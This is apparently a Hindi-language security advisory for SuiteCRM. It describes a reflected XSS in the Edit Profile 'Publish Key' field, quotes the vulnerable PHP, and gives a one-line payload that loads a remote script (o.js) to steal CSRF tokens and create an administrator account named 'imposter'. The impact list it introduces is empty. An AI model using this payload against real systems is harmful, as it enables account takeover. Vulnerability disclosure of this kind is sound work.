
SuiteCRM में एक सुरक्षा कमजोरी, जिसका उपयोग CSRF टोकन चुराने और अनधिकृत कार्य करने के लिए किया जा सकता है, जैसे उचित प्रमाणीकरण के बिना नए प्रशासनिक उपयोगकर्ता बनाना।
SuiteCRM के Edit Profile पृष्ठ पर 'Publish Key' फ़ील्ड Reflected Cross-Site Scripting (XSS) के प्रति संवेदनशील है, जो एक हमलावर को दुर्भावनापूर्ण JavaScript कोड इंजेक्ट करने की अनुमति देता है। इसका उपयोग CSRF टोकन चुराने और अनधिकृत कार्य करने के लिए किया जा सकता है, जैसे कि उचित प्रमाणीकरण के बिना नए व्यवस्थापक उपयोगकर्ता बनाना।
यह कमजोरी SuiteCRM अनुप्रयोग में Publish Key फ़ील्ड के अपर्याप्त इनपुट सत्यापन और स्वच्छता के कारण उत्पन्न होती है। जब कोई हमलावर एक दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करता है, तो यह एक प्रमाणित उपयोगकर्ता के सत्र के संदर्भ में निष्पादित होती है। इंजेक्ट की गई स्क्रिप्ट (o.js) फिर कैप्चर किए गए CSRF टोकन का उपयोग करके अनुरोधों को जाली बनाती है जो नए व्यवस्थापक उपयोगकर्ता बनाते हैं, जिससे CRM इंस्टेंस की अखंडता और सुरक्षा से समझौता होता है।
यह कमजोरी एक गंभीर क्रॉस-साइट स्क्रिप्टिंग (XSS) समस्या है। इसके प्रभाव में शामिल हैं:
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197